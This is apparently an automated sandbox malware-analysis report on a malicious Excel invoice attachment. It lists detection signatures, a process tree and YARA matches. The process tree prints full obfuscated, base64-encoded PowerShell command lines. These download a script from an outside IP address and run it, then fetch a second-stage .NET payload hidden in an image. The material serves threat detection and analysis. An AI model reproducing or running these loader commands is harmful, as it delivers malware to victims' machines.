Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice A037.xls

Overview

General Information

Sample name:Invoice A037.xls
Analysis ID:1572970
MD5:78c7227d02510326cd88eb38003b252e
SHA1:742a16e734f3e3ede2f8acdbc89aef3962c4f338
SHA256:41cf481a165a9e4c70bcd9170b283912783b18e5b8af8a21e76cb0f175d167c9
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected VBS Downloader Generic
Yara detected obfuscated html page
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3220 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3516 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3664 cmdline: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3688 cmdline: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3928 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3936 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 2580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • AcroRd32.exe (PID: 3752 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
      • RdrCEF.exe (PID: 1324 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
    • mshta.exe (PID: 2556 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3588 cmdline: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3580 cmdline: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 1120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 544 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3696 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbSJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith[1].tiffJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
        SourceRuleDescriptionAuthorStrings
        Process Memory Space: powershell.exe PID: 2580JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 2580INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x14297:$b2: ::FromBase64String(
          • 0x14d81:$b2: ::FromBase64String(
          • 0x306cb:$b2: ::FromBase64String(
          • 0x5fd56:$b2: ::FromBase64String(
          • 0x606c8:$b2: ::FromBase64String(
          • 0x61ace:$b2: ::FromBase64String(
          • 0x69ad0:$b2: ::FromBase64String(
          • 0x71d6b:$b2: ::FromBase64String(
          • 0x8f2dc:$b2: ::FromBase64String(
          • 0x8f343:$b2: ::FromBase64String(
          • 0x913f7:$b2: ::FromBase64String(
          • 0x926af:$b2: ::FromBase64String(
          • 0x14276:$b3: ::UTF8.GetString(
          • 0x14d60:$b3: ::UTF8.GetString(
          • 0x306aa:$b3: ::UTF8.GetString(
          • 0x5fd35:$b3: ::UTF8.GetString(
          • 0x606a7:$b3: ::UTF8.GetString(
          • 0x61aad:$b3: ::UTF8.GetString(
          • 0x69aaf:$b3: ::UTF8.GetString(
          • 0x71ba0:$b3: ::UTF8.GetString(
          • 0x8f322:$b3: ::UTF8.GetString(
          Process Memory Space: powershell.exe PID: 3912JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 3912INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x16c2:$b2: ::FromBase64String(
            • 0x2036:$b2: ::FromBase64String(
            • 0x1ce67:$b2: ::FromBase64String(
            • 0x1d7d9:$b2: ::FromBase64String(
            • 0x261b2:$b2: ::FromBase64String(
            • 0x325f9:$b2: ::FromBase64String(
            • 0x33106:$b2: ::FromBase64String(
            • 0x33a86:$b2: ::FromBase64String(
            • 0x3de9d:$b2: ::FromBase64String(
